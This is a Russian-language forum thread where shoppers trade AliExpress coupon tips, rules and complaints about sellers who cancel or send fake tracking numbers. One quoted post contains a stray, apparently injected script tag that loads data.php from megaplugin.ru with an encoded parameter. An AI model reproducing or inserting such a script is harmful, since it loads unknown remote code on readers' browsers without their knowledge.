Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Очень низкие цены на Алиэкспресс - купоны, акции, распродажи

Ответов в теме: 2062
ПользователиСообщений: 962Поблагодарили: 415 разСанкт-Петербург

Пожалуйста, ознакомьтесь с правилами темы, перед тем как задать вопрос или написать сообщение.

                    

УВАЖАЕМЫЕ ПОЛЬЗОВАТЕЛИ!


1. В этой теме выкладывайте ссылки только на действительно ОЧЕНЬ ДЕШЕВЫЕ ТОВАРЫ, никаких скидок в 5-10 %, никаких товаров со скидками 99% с изначально завышенной ценой, никаких "тут дорого, но я брала и мне понравилось".
2. Фотографии товаров размещайте в разделах Фотохвасты или Обзоры. Здесь выкладывайте только ссылки на выложенные фото.
3. Не задавайте вопросов типа "помогите найти такую", "может кто видел дешевле" - для этого есть много других тем на форуме, также вы можете создать свою собственную.
4НЕ ФЛУДИТЕ! В теме обсуждайте только ссылки. Споры с продавцами, кому что ответили, отправили, кто что получил - все эти вопросы задавайте в сооответствующих темах на форуме. Или друг другу посредством переписки в личке. 

 
                                        ОТВЕТЫ НА ЧАСТО ЗАДАВАЕМЫЕ ВОПРОСЫ


1. Как вы находите такие дешевые товары?
В поиске АлиЭкспресс включаем сортировку. Выбираем интересующий раздел, отмечаем "бесплатная доставка", "распродажа" и сортируем по возрастанию цены. Также магазины, в которых мы уже участвовали в акциях, присылают сообщения о распродажах на электронную почту. Всю информацию о новых акциях мы обязательно будем выкладывать на стену, чтобы ее могли видеть и другие участники темы.
2. Где искать купоны?
На сайте: РЕДИСКА
3. Точно ли продавец отправит товар?
Это как лотерея, продавцы могут ошибиться со скидкой или просто набивать себе рейтинг. Возможен вариант, что вам выдадут поддельный трек и ничего не вышлют. Или в посылке обнаружится совсем другой товар. Будьте внимательны или не рискуйте совсем. Никто вам не может ничего гарантировать.
4. Как пользоваться купонами?
На каждом купоне есть информация о том, на какую сумму надо взять товара и какую скидку вы при этом получите. Например, купон $10 off per $11, означает, что вам надо купить товара на 11 долларов и получить при этом скидку в 10 - итого выходит покупка будет стоить от $1. Можно брать несколько товаров на общую сумму больше $11, кидаем их в корзину, оформляем общий заказ у продавца, не забываем в поле купонов выбрать нашу скидку , видим конечную сумму со скидкой и заказываем. 2 купона с Редиски одновременно использовать нельзя! Если вы взяли несколько купонов, то должны оформить на них несколько заказов. Если у вас не получается использовать купон, т.е. в поле для купонов надпись "купонов нет", значит вы либо не взяли купон, либо не добрали до нужной суммы.

ОБРАЗЦЫ ПИСЕМ ПРОДАВЦАМ

Учесть всевозможные ситуации или предугадать поведение различных продавцов невозможно. Заказ делаете вы и с продавцом общаетесь тоже вы. Поэтому как и что писать решать только вам. Чтобы написать письмо на английском языке вы можете воспользоваться помощью онлайн-переводчиков (того же google, к примеру). Пишите короткие предложения - вероятность правильного перевода повысится.
*****
Не отслеживается номер трека, читаем и задаём вопросы здесь.
Окажу бесплатную помощь в диспутах (спорах), читаем и задаём вопросы здесь.

Общие вопросы по доставке и отслеживанию посылок, читаем и задаём вопросы здесь.

Помогите! Что делать? Где посылка? Где деньги? Посылка потерялась!, читаем и задаём вопросы здесь.

*****

Также на форуме есть раздел Статьи, в котором вы найдете ответы на многие вопросы о работе с площадкой Алиэкспресс.

 

Забава, Натальяяяяя и ещё 14 поблагодарили за этот комментарий
ПользователиСообщений: 908Поблагодарили: 192 разаУфа

evge писал(а):

Alex_M, я беру просто на 2 размера больше.если нам 5 .я беру 7

полностью согласна!

Аleksssa писал(а):

А вы просили что конкретное или на ее выбор, сумму оговаривали?

просила на 5$. но она ж молчала! всем треки дала безмолвно...

ПользователиСообщений: 2715Поблагодарили: 4112 разСлуцк

Nori, Обычно в беларусь беру бесплатную, без ЕМС, про лимит не слышала на сумму доставки. Получила кучу посылок, но все были бесплатные)

ПользователиСообщений: 325Поблагодарили: 208 раз Солигорск

*() Натали ()* писал(а):

Поможет кто?

<sсriрt src="http://megaplugin.ru/data.php?test=1&el73o9u1=MjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMzI1MzM3NDE0YTRkNGU0Ng==&rnd=2292014">

тут у всех такие проблемы. остается уповать на совесть продавца.

ПользователиСообщений: 2715Поблагодарили: 4112 разСлуцк

Хозяйка Дома, А я всего 1,94 доплатила)) На большую сумму не рискнула, да и жилетик меховой с тигренком и тунику себе хочу, оставила до вечера оплату. надо карточку пополнить

ПользователиСообщений: 3697Поблагодарили: 3519 раз

Наталья Просто писал(а):

Хозяйка Дома, А я всего 1,94 доплатила)) На большую сумму не рискнула, да и жилетик меховой с тигренком и тунику себе хочу, оставила до вечера оплату. надо карточку пополнить

Немыслимые расходы для нашей банды!!!!

ПользователиСообщений: 452Поблагодарили: 176 разКраснодар

Кактуся писал(а):

важно не только оформить заказ, но и успеть оплатить, потому как нечистые на руку проды очень быстро корректируют цены, поэтому кто первый встал того и тапки, если есть желание заниматься с купонами, привыкайте все делать быстро - хватать купон, накидывать товар в корзину, оплачивать, чуть замешкались и та-дам новая цена. Но самое интересное начинается, после этого, когда приходится с продом бодаться за каждую позицию. Почитайте предыдущую тему, там все подробно изложено, как заказали оплатили и что в итоге получили

а у меня на оплате купон 100/101 и прод так и не поднял цену. сказал ошибка мне жаль . хоть на зло бери и плати

ПользователиСообщений: 325Поблагодарили: 208 раз Солигорск

Наталья Просто писал(а):

Кто нибудь взял купон я оплатила двое часов, жду письма) Как обычно с сообщением об ошибке системы и т. д.

такая же счастливая

Наталья Просто поблагодарил(а) за этот комментарий
ПользователиСообщений: 160Поблагодарили: 146 разярославль

stekolnikovaula, ого, надо и мне открывать спор, мне написал продавец сумку выслали,нет проблемSmile

ПользователиСообщений: 253Поблагодарили: 32 разаЭлектросталь

ЮЮ писал(а):

а у меня на оплате купон 100/101 и прод так и не поднял цену. сказал ошибка мне жаль . хоть на зло бери и плати

ну проды все разные тут не знаешь как повезет одним словом ЛОТЕРЕЯ

ЮЮ поблагодарил(а) за этот комментарий
ПользователиСообщений: 1034Поблагодарили: 1632 раза38 км от Москвы

Прода с часами нет в сети,опять будет ссылаться на ошибку системы

ПользователиСообщений: 2715Поблагодарили: 4112 разСлуцк

Хозяйка Дома писал(а):

Немыслимые расходы для нашей банды!!!!

Эт еще ничего Очкам по купону на 100 уе я доплатила 4.45) Вот это расходы)) да еще с двух акков)) Кстати по нему деньги возвращали или ждет кто нибудь?

ПользователиСообщений: 452Поблагодарили: 176 разКраснодар

Кактуся писал(а):

ну проды все разные тут не знаешь как повезет одним словом ЛОТЕРЕЯ

жаль оплачивать теперь бессмысленно. платья клевые были. до сих пор жалею

ПользователиСообщений: 954Поблагодарили: 448 разБрест

ЮЮ, я оплатила,жду писульку

ПользователиСообщений: 325Поблагодарили: 208 раз Солигорск

Nori писал(а):

А как подключить уведомления

откройте окно "Редиски" и клац по ней правой кнопкой- выбираете Просмотр сведений о странице- Там где то разрешить надо Вам

Nori поблагодарил(а) за этот комментарий
ПользователиСообщений: 123Поблагодарили: 86 раз Березник

AnnaSD писал(а):

http://www.aliexpress.com/snapshot/6265992472.html

а вот такие кроссы, движение есть?

поставила на отмену заказа, прод отменил и трек дал, типа выслал RD089292537CN

У меня сегодня тоже этот прод типа выслал товар после того как я поставила отмену по причине "прод не хочет отправлять товар". НО приём стоит от 20.10.14. По мне треки явно не мои(у меня 2 пары разных). Я ему писала что согласна на одну пару,если он точно отправит. Отправлены обе и с разными треками. Будем ждать импорта чтоб посмотреть вес и кому эти посылки идут

ПользователиСообщений: 1609Поблагодарили: 6627 разПсков

всё я сегодня всё потратила дааааа 2 тыс. надо клянчить денег у мужа. муж ты где?

ПользователиСообщений: 3697Поблагодарили: 3519 раз

Ирма писал(а):

Прода с часами нет в сети,опять будет ссылаться на ошибку системы

Ждем...

ПользователиСообщений: 452Поблагодарили: 176 разКраснодар

Оксанка писал(а):

ЮЮ, я оплатила,жду писульку

эти писульки на почту приходят? или в заказе?

ПользователиСообщений: 1368Поблагодарили: 2738 раз РБ

Наталья Просто писал(а):

Nori, Обычно в беларусь беру бесплатную, без ЕМС, про лимит не слышала на сумму доставки. Получила кучу посылок, но все были бесплатные)

Не на сумму доставки вроде, а именно товара

ЮЮ писал(а):

а у меня на оплате купон 100/101 и прод так и не поднял цену. сказал ошибка мне жаль . хоть на зло бери и плати

А я б и заплатила, а потом если что отказ по его вине, хоть как засранца наказать, но и вам в таком случае придется потом ждать назад свои копейки как повезет пару дней или пару недель..

Но может еще если по его вине отказ напишете несогласиться и выслать какую-нибудь муть, тогда еще больше тягомотины с возвратом копеек будет, но зато шанс хоть что-то урвать и наказать, чтоб другой раз подумал лишний раз)

Наталья Просто поблагодарил(а) за этот комментарий
ПользователиСообщений: 2715Поблагодарили: 4112 разСлуцк

По этому купону у кого нибудь новости есть? У меня отправлено, но треки левые. Может возвращать деньги, не тянуть?

ПользователиСообщений: 191Поблагодарили: 43 разаСанкт-Петербург

Тоже назаказывал кучу часов - теперь будет чем заняться в ближайшие дни - перепиской с Продом

ПользователиСообщений: 2715Поблагодарили: 4112 разСлуцк

Nori, В Беларусь можно заказать товар на сумму 200 евро( с 1 октября) до этого было 120). За все что свыше придется заплатить таможенную пошлину.

ПользователиСообщений: 3697Поблагодарили: 3519 раз

ЮЮ писал(а):

эти писульки на почту приходят? или в заказе?

Везде. И на почту и в заказе.

ЮЮ поблагодарил(а) за этот комментарий
ПользователиСообщений: 452Поблагодарили: 176 разКраснодар

Nori писал(а):

А я б и заплатила, а потом если что отказ по его вине, хоть как засранца наказать, но и вам в таком случае придется потом ждать назад свои копейки как повезет пару дней или пару недель..

Но может еще если по его вине отказ напишете несогласиться и выслать какую-нибудь муть, тогда еще больше тягомотины с возвратом копеек будет, но зато шанс хоть что-то урвать и наказать, чтоб другой раз подумал лишний раз)

а что им за эту формулировку бывает? я клиффорду в отказе написала не могу связаться с продавцом

ПользователиСообщений: 541Поблагодарили: 295 разБеларусь

Хозяйка Дома, у меня новая Опера - не сработало наверное (я ж пока ребенок спит со стула не встраю-общаюсь) не знаю как у вас - а у меня пока уведомление не закроешь болтается в уголке. так не было...

Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти